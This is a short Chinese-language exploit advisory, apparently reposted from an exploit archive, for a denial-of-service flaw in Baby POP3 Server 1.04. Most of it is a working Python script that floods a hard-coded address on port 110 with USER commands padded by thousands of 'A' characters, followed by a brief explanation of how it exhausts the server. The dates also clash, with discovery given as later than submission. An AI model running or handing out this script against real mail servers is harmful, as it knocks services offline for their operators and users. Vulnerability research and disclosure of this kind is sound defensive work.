Baby POP3服务器1.04版拒绝服务漏洞分析

22 阅读1分钟

DOS Baby POP3 Server 1.04

2025年8月28日 提交者:Érick Sousa

风险等级: 中危 本地利用:远程利用:CVE编号: 暂无 CWE编号: 暂无

漏洞信息

漏洞标题: DOS Baby POP3 Server 1.04 发现日期: 2025年12月8日 漏洞作者: Érick Sousa (www.linkedin.com/in/erickssa) 厂商主页: www.pablosoftwaresolutions.com 软件链接: www.pablosoftwaresolutions.com/html/baby_p… 影响版本: Baby POP3 Server Version 1.04 测试环境: Windows XP 和 Windows 7

利用代码

# Python 3.13.5 ;)
import socket

jkcode = b"A"
counter = 0

while counter < 10000:
    counter += 10
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.18.240", 110))
    s.send(b"USER " + jkcode * counter + b"\r\n")
    s.close()

技术说明

该漏洞利用代码通过Python的socket库连接到目标POP3服务器(默认端口110),循环发送包含大量"A"字符的USER命令。每次迭代增加10个字符,最多发送10000个字符,导致目标服务器资源耗尽从而实现拒绝服务攻击。